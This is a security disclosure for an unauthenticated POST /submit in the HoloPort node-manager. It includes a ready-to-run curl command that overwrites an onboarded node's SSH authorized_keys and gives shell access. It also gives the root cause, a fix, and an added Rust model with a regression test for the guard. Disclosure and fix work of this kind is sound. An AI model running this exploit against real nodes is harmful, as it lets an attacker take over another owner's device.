Security Disclosure: POST /submit auth bypass allows SSH key injection on already-onboarded HoloPort #3

@futurehelp

SECURITY DISCLOSURE -- HoloPort node-manager POST /submit Auth Bypass (SSH Key Injection)

The node-manager service on every deployed HoloPort (port 8080) accepts unauthenticated POST requests to /submit after the node is already onboarded. An attacker on the same network can overwrite the owner's SSH authorized_keys file and gain full shell access.

Root cause: src/main.rs routing table applies is_authenticated to every management route except POST /submit. There is no state.onboarded guard either. write_ssh_keys at line 195 overwrites (not appends) the entire authorized_keys file.

Attack (one command, no auth):

curl -X POST http://<holo-node-ip>:8080/submit \
  -H "Content-Type: application/json" \
  -d '{"nodeName":"victim-node","sshKey":"ssh-ed25519 AAAA<attacker-key>","hwMode":"STANDARD"}'

Returns {"status":"ok"} on an already-onboarded node. Legitimate owner's SSH keys erased. Attacker gets full shell on HoloPort.

Severity: P2 (High) on LAN, Critical if port 8080 is internet-exposed.

Recommended fix: Add if state.onboarded { return 403; } at the top of handle_submit.

Coordinated disclosure. Requesting 90-day window before publishing.

-- Independent security researcher
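
The recommended guard, shown beside the reported behaviour in a simplified in-memory model. This is an added example, not part of the original issue and not the project's code. `State`, `SubmitRequest`, `handle_submit_unguarded` and `replay` are assumed names, the HTTP status is modelled as a `u16`, the key strings are constructed, and setting `onboarded` inside the handler is an assumption.

```rust
// Simplified model of the handler described in the report; not node-manager source.
struct State {
    onboarded: bool,
    authorized_keys: String, // stands in for the authorized_keys file
}

struct SubmitRequest {
    ssh_key: String,
}

// Overwrites the whole key list, matching the behaviour the report describes.
fn write_ssh_keys(state: &mut State, key: &str) {
    state.authorized_keys = format!("{}\n", key);
}

// Behaviour as reported: no onboarded check, so a later submit replaces the keys.
fn handle_submit_unguarded(state: &mut State, req: &SubmitRequest) -> u16 {
    write_ssh_keys(state, &req.ssh_key);
    state.onboarded = true; // assumption: onboarding completes here
    200
}

// With the recommended guard: refuse before any state is touched.
fn handle_submit(state: &mut State, req: &SubmitRequest) -> u16 {
    if state.onboarded {
        return 403;
    }
    write_ssh_keys(state, &req.ssh_key);
    state.onboarded = true; // assumption: onboarding completes here
    200
}

// Onboard once, then submit again; returns (second status, keys afterwards).
fn replay(handler: fn(&mut State, &SubmitRequest) -> u16) -> (u16, String) {
    let mut state = State { onboarded: false, authorized_keys: String::new() };
    // Constructed sample keys, not real key material.
    let first = SubmitRequest { ssh_key: "ssh-ed25519 OWNER-KEY-CONSTRUCTED".to_string() };
    let second = SubmitRequest { ssh_key: "ssh-ed25519 OTHER-KEY-CONSTRUCTED".to_string() };
    assert_eq!(handler(&mut state, &first), 200);
    (handler(&mut state, &second), state.authorized_keys)
}

fn main() {
    println!("unguarded: {:?}", replay(handle_submit_unguarded));
    println!("guarded:   {:?}", replay(handle_submit));
}
```

The same two-step replay works as a regression test against the real handler: the second submit must return 403 and leave the stored keys unchanged.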
